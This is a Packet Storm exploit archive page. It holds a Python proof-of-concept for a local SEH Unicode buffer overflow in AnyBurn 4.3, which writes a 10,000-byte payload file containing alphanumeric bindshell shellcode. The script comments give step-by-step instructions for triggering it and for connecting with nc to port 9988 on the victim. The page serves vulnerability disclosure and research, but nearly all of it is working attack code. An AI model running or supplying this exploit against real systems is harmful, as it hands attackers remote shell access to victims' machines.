what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AnyBurn 4.3 Local Buffer Overflow

AnyBurn 4.3 Local Buffer Overflow
Posted Dec 22, 2018
Authored by Matteo Malvica

AnyBurn version 4.3 SEH local buffer overflow exploit.

tags | exploit, overflow, local
SHA-256 | 721307441b009d986459a18b09c46385f0dc2a9ebc573853323b5b40f2bff89c

AnyBurn 4.3 Local Buffer Overflow

Change Mirror Download
#!/usr/bin/env python

# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
# Date: 20-12-2018
# Exploit Author: Matteo Malvica
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64 SP1
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002

# Steps to reproduce:
# 1.- Run the python code
# 2.- Open exploit.txt and copy its content to the clipboard
# 3.- Open AnyBurn and choose 'Copy disk to Image'
# 4.- Paste the content of exploit.txt into the field: 'Image file name'
# 5.- Click 'Create Now'
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'


# alphanumeric bindshell - port 9988, courtesy of b33f
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")


# total payload length 10000

align = (
"\x55" #push EBP - closer register to our shellcode, from where we are pivoting
"\x6e" #Venetian Padding
"\x58" #pop EAX
"\x6e" #Venetian Padding
"\x05\x22\x11" #add eax,0x11002200 \
"\x6e" #Venetian Padding |> +0xB00
"\x2d\x17\x11" #sub eax,0x11001700 /
"\x6e" #Venetian Padding
"\x50" #push EAX
"\x6e" #Venetian Padding
"\xC3") #RETN

nseh = "\x94\x94" # ANSI x94 translates to Unicode 201D
seh = "\xb5\x4d" # 0x004d00b5 POP POP RET in AnyBurn.exe module

preamble = "\x58" * 47 + shellcode + "\x58" * (9197-47- len(shellcode)) + nseh + seh
unicode_nops = "\x58" * 200
exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops)-len(align))

try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes lasagna payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close